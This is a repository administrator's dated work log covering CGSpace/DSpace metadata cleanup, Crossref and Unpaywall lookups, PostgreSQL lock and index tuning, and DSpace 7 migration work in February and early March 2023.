author: "Alan Orth"
categories: ["Notes"]
---
## 2023-02-01
- Export CGSpace to cross check the DOI metadata with Crossref
- I want to try to expand my use of their data to journals, publishers, volumes, issues, etc...
<!--more-->
- First, extract a list of DOIs for use with `crossref-doi-lookup.py`:
```console
$ csvcut -c 'cg.identifier.doi[en_US]' ~/Downloads/2023-02-01-cgspace.csv \
| csvgrep -c 1 -m 'doi.org' \
| csvgrep -c 1 -m ' ' -i \
| csvgrep -c 1 -r '.*cifor.*' -i \
| sed 1d > /tmp/2023-02-01-dois.txt
$ ./ilri/crossref-doi-lookup.py -e a.orth@cgiar.org -i /tmp/2023-02-01-dois.txt -o ~/Downloads/2023-01-31-crossref-results.csv -d
```
- Then extract the ID, DOI, journal, volume, issue, publisher, etc from the CGSpace dump and rename the `cg.identifier.doi[en_US]` to `doi` so we can join on it with the Crossref results file:
```console
$ csvcut -c 'id,cg.identifier.doi[en_US],cg.journal[en_US],cg.volume[en_US],cg.issue[en_US],dcterms.publisher[en_US],cg.number[en_US],dcterms.license[en_US]' ~/Downloads/2023-02-01-cgspace.csv \
| csvgrep -c 'cg.identifier.doi[en_US]' -r '.*cifor.*' -i \
| sed -e '1s/cg.identifier.doi\[en_US\]/doi/' \
-e 's_https://doi.org/__g' \
-e 's_https://dx.doi.org/__g' \
> /tmp/2023-02-01-cgspace-doi-metadata.csv
$ csvjoin -c doi /tmp/2023-02-01-cgspace-doi-metadata.csv ~/Downloads/2023-02-01-crossref-results.csv > /tmp/2023-02-01-cgspace-crossref-check.csv
```
- And import into OpenRefine for analysis and cleaning
- I just noticed that Crossref also has types, so we could use that in the future too!
- I got a few corrections after examining manually, but I didn't manage to identify any patterns that I could use to do any automatic matching or cleaning
## 2023-02-05
- Normalize text lang attributes in PostgreSQL, run a quick Discovery index, and then export CGSpace to check Initiative mappings and countries/regions
- Run all system updates on CGSpace (linode18) and reboot it
## 2023-02-06
- Peter said that a new Initiative was approved last month so we need to add it to CGSpace: `Fragility, Conflict, and Migration`
- There is lots of discussion about the "issue date" versus "available date" with Enrico and IFPRI, after lots of feedback from the PRMS QA
- I filed [an issue on CG Core to propose using `dcterms.available` as an optional field to indicate the online date](https://github.com/AgriculturalSemantics/cg-core/issues/43)
## 2023-02-07
- IFPRI's web developer Tony managed to get his Drupal harvester to have a useful user agent:
```console
54.x.x.x - - [06/Feb/2023:10:10:32 +0100] "POST /rest/items/find-by-metadata-field?limit=%22100&offset=0 HTTP/1.1" 200 58855 "-" "IFPRI drupal POST harvester"
```
- He also noticed that there is no pagination on POST requests to `/rest/items/find-by-metadata-field`, and that he needs to increase his timeout for requests that return 100+ results, ie:
```console
$ curl -f -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.actionArea", "value":"Systems Transformation", "language": "en_US"}'
```
- I need to ask on the DSpace Slack about this POST pagination
- Abenet and Udana noticed that the Handle server was not running
- Looking in the `error.log` file I see that the service is complaining about a lock file being present
- This is because Linode had to do emergency maintenance on the VM host this morning and the Handle server didn't shut down properly
- I'm having an issue with `poetry update` so I spent some time debugging and filed [an issue](https://github.com/python-poetry/poetry/issues/7482)
- Proof and import nine items for the Digital Innovation Inititive for IFPRI
- There were only some minor issues in the metadata
- I also did a duplicate check with `check-duplicates.py` just in case
- I did some minor updates on csv-metadata-quality
- First, to reduce warnings on non-SPDX licenses like "Copyrighted; all rights reserved" and "Other" since they are very common for us and I'm sick of seeing the warnings
- Second, to skip whitespace and newline fixes on the abstract field since so many times they are intended
## 2023-02-08
- Make some edits to IFPRI records requested by Jawoo and Leigh
- Help Alessandra upload a last minute report for SAPLING
- Proof and upload twenty-seven IFPRI records to CGSpace
- It's a good thing I did a duplicate check because I found three duplicates!
- Export CGSpace to update Initiative mappings and country/region mappings
- Then start a harvest on AReS
## 2023-02-09
- Do some minor work on the CSS on the DSpace 7 test
## 2023-02-10
- I noticed a large number of PostgreSQL locks from dspaceWeb on CGSpace:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
2033 dspaceWeb
```
- Looking at the lock age, I see some already 1 day old, including this curious query:
```console
select nextval ('public.registrationdata_seq')
```
- I killed all locks that were more than a few hours old
- Export CGSpace to update Initiative collection mappings
- Discuss adding `dcterms.available` to the submission form
- I also looked in the `dcterms.description` field on CGSpace and found ~1,500 items where the is an indication of an online published date
- Using some facets in OpenRefine I narrowed down the ones mentioning "online" and then extracted the dates to a new column:
```console
cells['dcterms.description[en_US]'].value.replace(/.*?(\d+{2}) ([a-zA-Z]+) (\d+{2}).*/,"$3-$2-$1")
```
- Then to handle formats like "2022-April-26" and "2021-Nov-11" I used some replacement GRELs (note the order so we don't replace short patterns in longer strings prematurely):
```console
value.replace("January","01").replace("February","02").replace("March","03").replace("April","04").replace("May","05").replace("June","06").replace("July","07").replace("August","08").replace("September","09").replace("October","10").replace("November","11").replace("December","12")
value.replace("Jan","01").replace("Feb","02").replace("Mar","03").replace("Apr","04").replace("May","05").replace("Jun","06").replace("Jul","07").replace("Aug","08").replace("Sep","09").replace("Oct","10").replace("Nov","11").replace("Dec","12")
```
- This covered about 1,300 items, then I did about 100 more messier ones with some more regex wranling
- I removed the `dcterms.description[en_US]` field from items where I updated the dates
- Then I added `dcterms.available` to the submission form and the item view
- We need to announce this to the editors
## 2023-02-13
- Export CGSpace to do some metadata quality checks
- I added CGIAR Trust Fund as a donor to some new Initiative outputs
- I moved some abstracts from the description field
- I moved some version information to the `cg.edition` field
## 2023-02-14
- The PRMS team in Colombia sent some questions about countries on CGSpace
- I had to fix some, that were clearly wrong, but there is also a difference between CGSpace and MEL because we use mostly iso-codes, and MEL uses the UN M.49 list
- Then I re-ran the country code tagger from cgspace-java-helpers, forcing the update on all items in the Initiatives community
- Remove Alliance research levers from `cg.contributor.crp` field after discussing with Daniel and Maria
- This was a mistake on TIP's part, and there is no direct mapping between research levers and CRPs
- I exported CGSpace to check Initiative collection mappings, regions, and licenses
- Peter told me that all CGIAR blog posts for the Initiatives should be CC-BY-4.0, and I see the logo at the bottom in light gray!
- I had previously missed that and removed some licenses for blog posts
- I checked cgiar.org, ifpri.org, icarda.org, iwmi.cgiar.org, irri.org, etc and corrected a handful
- Start a harvest on AReS
## 2023-02-15
- Work on rebasing my local DSpace 7 dev branches on top of the latest 7.5-SNAPSHOT
- It seems the issues I had with the `dspace submission-forms-migrate` tool in [August, 2022]({{< relref "2022-08.md" >}}) were fixed
- I imported a fresh PostgreSQL snapshot from CGSpace and then removed the Atmire migrations and ran the new migrations as I originally noted in [March, 2022]({{< relref "2022-03.md" >}}), and is pointed out in the [DSpace 7 upgrade notes](https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace)
- Now I get a new error:
```console
localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
localhost/dspace7= \q
$ ./bin/dspace database migrate ignored
...
CREATE INDEX resourcepolicy_action_idx ON resourcepolicy(action_id)
at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.handleException(DefaultSqlScriptExecutor.java:275)
at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.executeStatement(DefaultSqlScriptExecutor.java:222)
at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.execute(DefaultSqlScriptExecutor.java:126)
at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.executeOnce(SqlMigrationExecutor.java:69)
at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.lambda$execute$0(SqlMigrationExecutor.java:58)
at org.flywaydb.core.internal.database.DefaultExecutionStrategy.execute(DefaultExecutionStrategy.java:27)
at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.execute(SqlMigrationExecutor.java:57)
at org.flywaydb.core.internal.command.DbMigrate.doMigrateGroup(DbMigrate.java:377)
... 24 more
Caused by: org.postgresql.util.PSQLException: ERROR: relation "resourcepolicy_action_idx" already exists
at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2676)
at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2366)
at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:356)
at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:496)
at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:413)
at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:333)
at org.postgresql.jdbc.PgStatement.executeCachedSql(PgStatement.java:319)
at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:295)
at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:290)
at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:193)
at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:193)
at org.flywaydb.core.internal.jdbc.JdbcTemplate.executeStatement(JdbcTemplate.java:201)
at org.flywaydb.core.internal.sqlscript.ParsedSqlStatement.execute(ParsedSqlStatement.java:95)
at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.executeStatement(DefaultSqlScriptExecutor.java:210)
... 30 more
```
- I dropped that index and then the migration succeeded:
```console
localhost/dspace7= ☘ DROP INDEX resourcepolicy_action_idx;
localhost/dspace7= ☘ \q
$ ./bin/dspace database migrate ignored
Done.
```
- I think that particular error is because I applied the [indexes in this unmerged DSpace 6 patch](https://github.com/DSpace/DSpace/pull/1792), so I don't need to report this as an error in DSpace 7
## 2023-02-16
- I found a suspicious number of PostgreSQL locks on CGSpace and decided to investigate:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
44 dspaceApi
372 dspaceCli
446 dspaceWeb
```
- This started happening yesterday and I killed a few locks that were several hours old after inspecting the `locks-age.sql` output
- I also checked the `locks.sql` output, which helpfully lists the blocked PID and the blocking PID, to find one blocking PID that was idle in transaction
- I killed that process and then all other locks were instantly processed
- I filed [a GitHub issue](https://github.com/DSpace/dspace-angular/issues/2103) on dspace-angular requesting the item view to use the bitstream description instead of the file name if present
- Weekly CG Core types meeting
- I need to go through the actions and remove those items that are only for CGSpace internal use, ie:
- CD-ROM
- Manuscript-unpublished
- Photo Report
- Questionnaire
- Wiki
- Weekly CGIAR Repository Working Group meeting
- I did some experiments with Crossref dates for about 20,000 DOIs in CGSpace using my `crossref-doi-lookup.py` script
- Some things I noted from reading the [Crossref API docs](https://github.com/CrossRef/rest-api-doc/blob/master/api_format.md) and inspecting the records for a few dozen DOIs manually:
- `["created"]["date-parts"]` → Date on which the DOI was first registered (not useful for us)
- `["published-print"]["date-parts"]` → Date on which the work was published in print
- `["journal-issue"]["published-print"]["date-parts"]` → When present, is 99% the same as the above
- `["published-online"]["date-parts"]` → Date on which the work was published online
- `["journal-issue"]["published-online"]["date-parts"]` → Much more rare, and only 50% the same as the above, so unreliable
- `["issued"]["date-parts"]` → Earliest of published-print and published-online (not useful to us)
- After checking the DOIs manully I decided that when the `published-print` date exists, it is usually more accurate than our issued dates
- I set 12,300 issue dates to those from Crossref
- I also decided that, when `published-online` exists, it is usually accurate when I check the publisher page (we don't have many online dates to compare)
- I set the available date for ~7,000 items to the published-online date as long as:
- There was no `dcterms.available` date already
- It was different than the issued date, because for now I only want online dates that are different, in case this is an online only journal in which case that can be the issue date... maybe I'll re-visit that later
## 2023-02-17
- It seems some (all?) of the changes I applied to dates last night didn't get saved...
- I don't know what happened, so I will run them again after some investigation
- I submitted the first batch of ~7,600 changes and it took twelve hours!
- I almost cancelled it because after applying the changes there was a lock blocking everything for two hours, and it seemed to be stuck, but I kept checking it and saw that the `query_start` and `state_change` were being updated despite it being state "idle in transaction":
```console
$ psql -c 'SELECT * FROM pg_stat_activity WHERE pid=1025176' | less -S
```
- I will apply the other changes in smaller batches...
- Lately I've noticed a lot of activity from the country code tagger curation task
- Looking in the logs I see items being tagged that are very old and should have already been tagged years ago
- Also, I see a ton of these errors whenever the task is updating an item:
```console
2023-02-17 08:01:00,252 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/89020 with status: 0. Result: '10568/89020: added 1 alpha2 country code(s)'
2023-02-17 08:01:00,467 ERROR com.atmire.versioning.ModificationLogger @ Error while writing item to versioning index: a0fe9d9a-6ac1-4b6a-8fcb-dae07a6bbf58 message:missing required field: epersonID
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: missing required field: epersonID
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
at com.atmire.versioning.ModificationLogger.indexItem(ModificationLogger.java:263)
at com.atmire.versioning.ModificationConsumer.end(ModificationConsumer.java:134)
at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:157)
at org.dspace.core.Context.dispatchEvents(Context.java:455)
at org.dspace.curate.Curator.visit(Curator.java:541)
at org.dspace.curate.Curator$TaskRunner.run(Curator.java:568)
at org.dspace.curate.Curator.doCollection(Curator.java:515)
at org.dspace.curate.Curator.doCommunity(Curator.java:487)
at org.dspace.curate.Curator.doSite(Curator.java:451)
at org.dspace.curate.Curator.curate(Curator.java:269)
at org.dspace.curate.Curator.curate(Curator.java:203)
at org.dspace.curate.CurationCli.main(CurationCli.java:220)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
```
- This must be related...
## 2023-02-18
- I realized why the country-code-tagger was tagging everything: I had overridden the `force` parameter last week!
- Start a harvest on AReS
## 2023-02-20
- IWMI is concerned that some of their items with top Altmetric attention scores don't show up in the AReS Explorer
- I looked into it for one and found that AReS is using the Handle, but Altmetric hasn't associated the Handle with the DOI
- Looking into country and region issues for the PRMS team
- Last week they had some questions about some invalid countries that ended up being typos
- I realized my cgspace-java-helpers country-code-tagger curation task is not using the latest version, so it was missing Türkiye
- I compiled the new version and ran it manually, but I have to upload a new version to Maven Central and then update the dependency in `dspace/modules/additions/pom.xml` ughhhhhh
- I tagged version 6.2 with the change for Türkiye and uploaded to to Maven Central with `mvn clean deploy`
- I'm having second thoughts about switching to UN M.49 for countries because there are just too many tradeoffs
- I want to find a way to keep our existing list, and codify some rules for it
- There are several discussions related to the shortcomings of ISO themselves and the iso-codes project, for example:
- [Inconsistency with articles in ISO-3166-1 English short names](https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/33) (this one was filed by me two years ago!)
- [ISO 3166-1: What's the policy for `common_name`?](https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/44)
- I almost want to say fuck it, let's just use iso-codes and tell everyone to deal with it, but make sure we handle ISO 3166-1 Alpha2 or probably Alpha3 in the future
- Something like:
- Prefer `common_name` if it exists
- Prefer the shorter of `name` and `official name`
## 2023-02-21
- Continue working on my `parse-iso-codes.py` script to parse the iso-codes JSON for ISO 3166-1
- I also started a spreadsheet to track current CGSpace country names, proposed new names using the compromise above, and UN M.49 names
- I proposed this to Peter but he wasn't happy because there are still some stupidly long and political names there
- I bumped the version of cgspace-java-helpers to 6.2-SNAPSHOT and pushed it to Maven Central because I can't figure out how to get non-snapshot releases to go there
- Ouch, grunt 1.6.0 was released a few weeks ago, which relies on Node.js v16, thus breaking the Mirage 2 build in DSpace 6
- I filed [an issue in DSpace](https://github.com/DSpace/DSpace/issues/8676)
- Help Moises from CIP troubleshoot harvesting issues on their WordPress site
- I see 2,000 requests with the user agent "RTB website BOT" today and they are all HTTP 200
```console
# grep 'RTB website BOT' /var/log/nginx/rest.log | awk '{print $9}' | sort | uniq -c | sort -h
2023 200
```
- Start reviewing and fixing metadata for Sam's ~250 CAS publications from last year
- Both Abenet and Peter have already looked at them and Sam has been waiting for months on this
## 2023-02-22
- Continue proofing CAS records for Sam
- I downloaded all the PDFs manually and checked the issue dates for each from the PDF, noting some that had licenses, ISBNs, etc
- I combined the title, abstract, and system subjects into one column to mine them for AGROVOC terms:
```console
toLowercase(value) + toLowercase(cells["dcterms.abstract"].value) + toLowercase(cells["cg.subject.system"].value.replace("||", " "))
```
- Then I extracted a list of AGROVOC terms the same way I did in [August, 2022]({{< relref "2022-08.md" >}}) and used this Jython code to extract matching terms:
```python
import re
with open(r"/tmp/agrovoc-subjects.txt",'r') as f :
terms = [name.rstrip().lower() for name in f]
return "||".join([term for term in terms if re.match(r".*\b" + term + r"\b.*", value.lower())])
```
- Then I used [this cool Jython to remove duplicate metadata values](https://stackoverflow.com/questions/15419080/openrefine-remove-duplicates-from-list-with-jython):
```python
deduped_list = list(set(value.split("||")))
return '||'.join(map(str, deduped_list))
```
- Then I did the same with countries, woooooo!
- I checked for duplicates and found forty-one
- I just stumbled upon UNTERM, which provides the official list of countries for the UN General Assembly, including a downloadable Excel with the short and formal names in all UN languages: https://unterm.un.org/unterm2/en/country
- I created a [pull request to add common names for Iran, Laos, and Syria on the Debian iso-codes package](https://salsa.debian.org/iso-codes-team/iso-codes/-/merge_requests/32)
- These are remarked upon in the ISO.org online browsing platform for ISO 3166-1
## 2023-02-23
- Tag v0.6.1 of csv-metadata-quality
- Weekly meeting about CG Core types
- I need to get some definitions from Peter for some types
- Peter sent some of the feedback from Indira to XMLUI
- I removed some old facets, limited others to less values, and adjusted the recent submissions from 5 to 10
## 2023-02-24
- More work on understanding Sam's CAS publications to prepare for uploading them to CGSpace
- I need to reconcile the duplicates and Peter's type re-classifications in the final version of the spreadsheet
- I flagged all the duplicates by creating a custom text facet matching all their titles like:
```console
or(
isNotNull(value.match("Evaluation of the CGIAR Research Program on Climate Change, Agriculture and Food Security (CCAFS)")),
isNotNull(value.match("Report of the IEA Workshop on Development, Use and Assessment of TOC in CGIAR Research, Rome, 12-13 January 2017")),
isNotNull(value.match("Report of the IEA Workshop on Evaluating the Quality of Science, Rome, 10-11 December 2015")),
isNotNull(value.match("Review of CGIARs Intellectual Assets Principles")),
...
)
```
- Annoyingly this seems to miss the ones with parenthesis so I had to do those manually
- This matched thirty-seven items, then I flagged them so I can handle them separately after uploading the others
- Then I used the URL field in the old version of the file to match the items with types `Evaluation` and `Independent Commentary` since Peter changed them
- I added extent, volume, issue, number, and affiliation to a few journal articles
- Then I did some last minute checks to make sure we're not uploading files for items marked as having "multiple documents"
## 2023-02-25
- Oh nice, my [pull request adding common names for Iran, Laos, and Syria to iso-codes](https://salsa.debian.org/iso-codes-team/iso-codes/-/merge_requests/32) was merged
- I did a test import of the 198 CAS Publications on DSpace Test, then inspected Abenet's file with Gaia's "multiple documents" field one more time and decided to do the import on CGSpace
- Gaia's "multiple documents" column had some text like "E6" and "F7" that didn't make any sense, and those files were not in the Sharepoint even
## 2023-02-26
- Start a harvest on AReS
## 2023-02-27
- I found two items for the CAS Publications that were marked as a duplicates, but upon second inspection were not, so I uploaded it to CGSpace
- That makes the total number of items for CAS 200...
- I did some CSV joining and inspections with the remaining thirty-six duplicates with the metadata for their existing items on CGSpace and uploaded them
- Do some work on the new DSpace 7 submission forms
- I ended up reverting to the stock configuration to use some new techniques like the style and type bind
## 2023-02-28
- Keep working on the DSpace 7 submission forms
- As part of this I asked Maria and Francesca if they are still using the `cg.link.permalink` (Bioversity publications permalink) and they said no, so we can remove it from the submission form
- I also removed `cg.subject.ccafs` since the CRP ended over a year ago and `cg.subject.pabra` since there have only been a handful of new items in [their collection](https://hdl.handle.net/10568/80211) and they seem to be using Alliance subjects instead
- I filed [a bug](https://github.com/DSpace/DSpace/issues/8686) on DSpace regarding the inability to add freetext values from an input field that uses a vocabulary
<!-- vim: set sw=2 ts=2: -->

655
content/posts/2023-03.md Normal file
View File

@ -0,0 +1,655 @@
---
title: "March, 2023"
date: 2023-03-01T07:58:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-03-01
- Remove `cg.subject.wle` and `cg.identifier.wletheme` from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)
- [iso-codes 4.13.0 was released](https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28), which incorporates my changes to the common names for Iran, Laos, and Syria
- I finally got through with porting the input form from DSpace 6 to DSpace 7
<!--more-->
- I can't put my finger on it, but the input form has to be formatted very particularly, for example if your rows have more than two fields in them with out a sufficient Bootstrap grid style, or if you use a `twobox`, etc, the entire form step appears blank
## 2023-03-02
- I did some experiments with the new [Pandas 2.0.0rc0 Apache Arrow support](https://datapythonista.me/blog/pandas-20-and-the-arrow-revolution-part-i)
- There is a change to the way nulls are handled and it causes my tests for `pd.isna(field)` to fail
- I think we need consider blanks as null, but I'm not sure
- I made some adjustments to the Discovery sidebar facets on DSpace 6 while I was looking at the DSpace 7 configuration
- I downgraded CIFOR subject, Humidtropics subject, Drylands subject, ICARDA subject, and Language from DiscoverySearchFilterFacet to DiscoverySearchFilter in `discovery.xml` since we are no longer using them in sidebar facets
## 2023-03-03
- Atmire merged one of my old pull requests into COUNTER-Robots:
- [COUNTER_Robots_list.json: Add new bots](https://github.com/atmire/COUNTER-Robots/pull/54)
- I will update the local ILRI overrides in our DSpace spider agents file
## 2023-03-04
- Submit a [pull request on pycountry to use iso-codes 4.13.0](https://github.com/flyingcircusio/pycountry/pull/156)
## 2023-03-05
- Start a harvest on AReS
## 2023-03-06
- Export CGSpace to do Initiative collection mappings
- There were thirty-three that needed updating
- Send Abenet and Sam a list of twenty-one CAS publications that had been marked as "multiple documents" that we uploaded as metadata-only items
- Goshu will download the PDFs for each and upload them to the items on CGSpace manually
- I spent some time trying to get csv-metadata-quality working with the new Arrow backend for Pandas 2.0.0rc0
- It seems there is a problem recognizing empty strings as na with `pd.isna()`
- If I do `pd.isna(field) or field == ""` then it works as expected, but that feels hacky
- I'm going to test again on the next release...
- Note that I had been setting both of these global options:
```
pd.options.mode.dtype_backend = 'pyarrow'
pd.options.mode.nullable_dtypes = True
```
- Then reading the CSV like this:
```
df = pd.read_csv(args.input_file, engine='pyarrow', dtype='string[pyarrow]'
```
## 2023-03-07
- Create a PostgreSQL 14 instance on my local environment to start testing compatibility with DSpace 6 as well as all my scripts:
```console
$ podman pull docker.io/library/postgres:14-alpine
$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:14-alpine
$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
```
- Peter sent me a list of items that had ILRI affiation on Altmetric, but that didn't have Handles
- I ran a duplicate check on them to find if they exist or if we can import them
- There were about ninety matches, but a few dozen of those were pre-prints!
- After excluding those there were about sixty-one items we already have on CGSpace so I will add their DOIs to the existing items
- After joining these with the records from CGSpace and inspecting the DOIs I found that only forty-four were new DOIs
- Surprisingly some of the DOIs on Altmetric were not working, though we also had some that were not working (specifically the Journal of Agricultural Economics seems to have reassigned DOIs)
- For the rest of the ~359 items I extracted their DOIs and looked up the metadata on Crossref using my `crossref-doi-lookup.py` script
- After spending some time cleaning the data in OpenRefine I realized we don't get access status from Crossref
- We can imply it if the item is Creative Commons, but otherwise I might be able to use [Unpaywall's API](https://unpaywall.org/products/api)
- I found some false positives in Unpaywall, so I might only use their data when it says the DOI is not OA...
- During this process I updated my `crossref-doi-lookup.py` script to get more information from Crossref like ISSNs, ISBNs, full journal title, and subjects
- An unscientific comparison of duplicate checking Peter's file with ~500 titles on PostgreSQL 12 and PostgreSQL 14:
- PostgreSQL 12: `0.11s user 0.04s system 0% cpu 19:24.65 total`
- PostgreSQL 14: `0.12s user 0.04s system 0% cpu 18:13.47 total`
## 2023-03-08
- I am wondering how to speed up PostgreSQL trgm searches more
- I see my local PostgreSQL is using vanilla configuration and I should update some configs:
```console
localhost/dspacetest= ☘ SELECT setting, unit FROM pg_settings WHERE name = 'shared_buffers';
setting │ unit
─────────┼──────
16384 │ 8kB
(1 row)
```
- I re-created my PostgreSQL 14 container with some extra memory settings:
```console
$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:14-alpine -c shared_buffers=1024MB -c random_page_cost=1.1
```
- Then I created a GiST [index on the `metadatavalue` table to try to speed up the trgm similarity operations](https://alexklibisz.com/2022/02/18/optimizing-postgres-trigram-search):
```console
localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gist_idx ON metadatavalue USING gist(text_value gist_trgm_ops(siglen=64)); # \di+ shows index size is 795MB
```
- That took a few minutes to build... then the duplicate checker ran in 12 minutes: `0.07s user 0.02s system 0% cpu 12:43.08 total`
- On a hunch, I tried with a GIN index:
```console
localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gin_idx ON metadatavalue USING gin(text_value gin_trgm_ops); # \di+ shows index size is 274MB
```
- This ran in 19 minutes: `0.08s user 0.01s system 0% cpu 19:49.73 total`
- So clearly the GiST index is better for this task
- I am curious if I increase the signature length in the GiST index from 64 to 256 (which will for sure increase the size taken):
```console
localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gist_idx ON metadatavalue USING gist(text_value gist_trgm_ops(siglen=256)); # \di+ shows index size is 716MB, which is less than the previous GiST index...
```
- This one finished in ten minutes: `0.07s user 0.02s system 0% cpu 10:04.04 total`
- I might also want to [increase my `work_mem`](https://stackoverflow.com/questions/43008382/postgresql-gin-index-slower-than-gist-for-pg-trgm) (default 4MB):
```console
localhost/dspacetest= ☘ SELECT setting, unit FROM pg_settings WHERE name = 'work_mem';
setting │ unit
─────────┼──────
4096 │ kB
(1 row)
```
- After updating my Crossref lookup script and checking the remaining ~359 items I found a eight more duplicates already existing on CGSpace
- Wow, I found a [really cool way to fetch URLs in OpenRefine](https://programminghistorian.org/en/lessons/fetch-and-parse-data-with-openrefine#example-1-fetching-and-parsing-html)
- I used this to fetch the open access status for each DOI from Unpaywall
- First, create a new column called "url" based on the DOI that builds the request URL. I used a Jython expression:
```python
unpaywall_baseurl = 'https://api.unpaywall.org/v2/'
email = "a.orth+unpaywall@cgiar.org"
doi = value.replace("https://doi.org/", "")
request_url = unpaywall_baseurl + doi + '?email=' + email
return request_url
```
- Then create a new column based on fetching the values in that column. I called it "unpaywall_status"
- Then you get a JSON blob in each and you can extract the Open Access status with a GREL like `value.parseJson()['is_oa']`
- I checked a handful of results manually and found that the limited access status was more trustworthy from Unpaywall than the open access, so I will just tag the limited access ones
- I merged the funders and affiliations from Altmetric into my file, then used the same technique to get Crossref data for open access items directly into OpenRefine and parsed the abstracts
- The syntax was hairy because it's marked up with tags like `<jats:p>`, but this got me most of the way there:
```console
value.replace("jats:p", "jats-p").parseHtml().select("jats-p")[0].innerHtml()
value.replace("<jats:italic>","").replace("</jats:italic>", "")
value.replace("<jats:sub>","").replace("</jats:sub>", "").replace("<jats:sup>","").replace("</jats:sup>", "")
```
- I uploaded the 350 items to DSpace Test so Peter and Abenet can explore them
- I exported a list of authors, affiliations, and funders from the new items to let Peter correct them:
```console
$ csvcut -c dc.contributor.author /tmp/new-items.csv | sed -e 1d -e 's/"//g' -e 's/||/\n/g' | sort | uniq -c | sort -nr | awk '{$1=""; print $0}' | sed -e 's/^ //' > /tmp/new-authors.csv
```
- Meeting with FAO AGRIS team about how to detect duplicates
- They are currently using a sha256 hash on titles, which will work, but will only return exact matches
- I told them to try to normalize the string, drop stop words, etc to increase the possibility that the hash matches
- Meeting with Abenet to discuss CGSpace issues
- She reminded me about needing a metadata field for first author when the affiliation is ILRI
- I said I prefer to write a small script for her that will check the first author and first affiliation... I could do it easily in Python, but would need to put a web frontend on it for her
- Unless we could do that in AReS reports somehow
## 2023-03-09
- Apply a bunch of corrections to authors, affiliations, and donors on the new items on DSpace Test
- Meeting with Peter and Abenet about future OpenRXV developments, DSpace 7, etc
- I submitted an [issue on MEL asking them to add provenance metadata when submitting to CGSpace](https://github.com/CodeObia/MEL/issues/11173)
## 2023-03-10
- CKM is getting ready to launch their new website and they display CGSpace thumbnails at 255x362px
- Our thumbnails are 300px so they get up-scaled and look bad
- I realized that the last time we [increased the size of our thumbnails was in 2013](https://github.com/ilri/DSpace/commit/5de61e220124c1d0441c87cd7d36d18cb2293c03), from 94x130 to 300px
- I offered to CKM that we increase them again to 400 or 600px
- I did some tests to check the thumbnail file sizes for 300px, 400px, 500px, and 600px on [this item](https://hdl.handle.net/10568/126388):
```console
$ ls -lh 10568-126388-*
-rw-r--r-- 1 aorth aorth 31K Mar 10 12:42 10568-126388-300px.jpg
-rw-r--r-- 1 aorth aorth 52K Mar 10 12:41 10568-126388-400px.jpg
